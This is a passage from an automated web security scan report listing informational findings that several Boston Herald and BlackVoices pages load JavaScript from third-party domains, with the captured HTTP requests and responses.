http://o.aolcdn.com/art/merge/?f=/_media/channels/common.js&f=/_media/channels/us.bv/bv.js&f=/_media/aolvideo30/mp.js&f=/_media/channels/us.news20/news20.js&f=/onlineopinions3ts/oo_engine.js&ver=1e&expsec=31536000&expsec=864000
http://o.aolcdn.com/art/webwidgets/sfsw_v1_1/feeds_subscribe.js
http://o.aolcdn.com/feedback/feedback1.js
http://o.aolcdn.com/omniunih.js
http://cdn.channel.aol.com/_media/channels/ad_refresher.js
http://js.adsonar.com/js/adsonar.js
http://www.aolcdn.com/_media/ke_tools/mmx_refresh_patch.js

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3244834828.1127760205.2705065472; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 28 Jan 2011 15:05:58 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31059
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm29 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</title>


<script language="javascript" type="text/javascript" src="http://o.aolcdn.com/journals_js/journals_blog_this.js"></script>
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
p://o.aolcdn.com/art/merge/?f=/_media/channels/common.css&f=/_media/channels/us.bv/bv.css&f=/_media/ch_css/bv_redesign-r18g.css&f=/_media/ch_bv/bv_comments.css&ver=1b&expsec=31536000&expsec=864000" />
<script type="text/javascript" src="http://o.aolcdn.com/art/merge/?f=/_media/channels/common.js&f=/_media/channels/us.bv/bv.js&f=/_media/aolvideo30/mp.js&f=/_media/channels/us.news20/news20.js&f=/onlineopinions3ts/oo_engine.js&ver=1e&expsec=31536000&expsec=864000"></script>
...[SNIP]...
<!-- Standard Feed Subscribe Widget Include -->
<script src="http://o.aolcdn.com/art/webwidgets/sfsw_v1_1/feeds_subscribe.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://o.aolcdn.com/feedback/feedback1.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...
</div>


<script src="http://cdn.channel.aol.com/_media/channels/ad_refresher.js" type="text/javascript" language="javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<div class="text">
<script type="text/javascript" src="http://www.aolcdn.com/_media/ke_tools/mmx_refresh_patch.js"> </script>
...[SNIP]...

18.572. http://www.bostonherald.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains (the script tags highlighted in the response below):

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/tab_control.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?nocache=123
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/carousel.js
http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028
http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077
http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092
http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121
http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE
http://edge.quantserve.com/quant.js
http://q1digital.checkm8.com/adam/cm8adam_1_call.js

Request

GET / HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 157372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- // 728_SWAP_TEMPLATE // -
...[SNIP]...
<!--// end INTERSTITIAL //-->
<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js?nocache=123" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div id="containerSliderInner">
<script src="http://cache.heraldinteractive.com/js/carousel.js" type="text/javascript"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121"></script>
...[SNIP]...
<div id="busTabsHp" style="width:180px; margin:0 auto;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

18.573. http://www.bostonherald.com/&WIDTH=1036&HEIGHT=1012&WIDTH_RANGE=WR_D&DATE=01110128&HOUR=15&RES=RS21&ORD=7769683764781803&req=fr&&&~=&

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /&WIDTH=1036&HEIGHT=1012&WIDTH_RANGE=WR_D&DATE=01110128&HOUR=15&RES=RS21&ORD=7769683764781803&req=fr&&&~=&

Issue detail

The response (a 404 page) dynamically includes the following scripts from other domains (the script tags highlighted in the response below):

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/tab_control.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/navigation.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://edge.quantserve.com/quant.js

Request

GET /&WIDTH=1036&HEIGHT=1012&WIDTH_RANGE=WR_D&DATE=01110128&HOUR=15&RES=RS21&ORD=7769683764781803&req=fr&&&~=& HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:15:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.574. http://www.bostonherald.com/about/contact/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /about/contact/

Issue detail

The response dynamically includes the following scripts from other domains (the script tags highlighted in the response below):

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/tab_control.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/navigation.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://edge.quantserve.com/quant.js

Request

GET /about/contact/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:10:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 35568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.575. http://www.bostonherald.com/about/contact/news_tip.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /about/contact/news_tip.bg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/contact/news_tip.bg HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:11:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 31651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.576. http://www.bostonherald.com/about/electronic_edition/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /about/electronic_edition/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/electronic_edition/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:10:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 26986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.577. http://www.bostonherald.com/about/home_delivery/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /about/home_delivery/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about/home_delivery/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:08:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 32451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.578. http://www.bostonherald.com/blogs/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:47:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 68620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

18.579. http://www.bostonherald.com/blogs/entertainment/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/entertainment/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/entertainment/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:55:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
